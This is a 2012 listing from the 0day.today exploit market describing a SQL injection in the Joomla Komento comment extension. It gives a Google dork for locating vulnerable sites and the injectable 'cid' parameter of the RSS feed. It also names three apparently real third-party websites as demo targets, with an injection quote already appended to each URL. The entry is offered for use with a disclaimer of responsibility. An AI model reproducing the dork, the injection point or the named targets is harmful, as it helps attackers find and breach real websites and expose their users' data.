[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_komento Sql injection vulnerability

Author
Crim3R
Risk
[
Security Risk High
]
0day-ID
0day-ID-19365
Category
web applications
Date add
24-08-2012
Platform
php
###################################################################################

# Exploit Title: Joomla component komento Sql Inection Vulnerability
#
# Google Dork:inurl:component/komento/
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://stackideas.com/komento.html
#
# Tested on: all
#
###################################################################################

$
$        Author will be not responsible for any damage.
$
###################################################################################

 
========================================
 Komento is a lightweight Joomla comment extension to manage user comments in 
articles, blogs, and more.
 
 Vulnerability is in Rss Feed :
 component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql 
injection]
 
 D3M0 : 
 
 http://keep-it-sexy.com/component/komento/rss?format=feed&component=com_content&cid=152%27

 
 http://www.bonyannew.ir/component/komento/?view=rss&format=feed&component=com_content&cid=52%27

 
 http://www.plazaris.com/component/komento/?view=rss&format=feed&component=com_content&cid=93%27


===============Crim3R@Att.Net===========

$home = %00
thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir



#  0day.today [2024-12-26]  #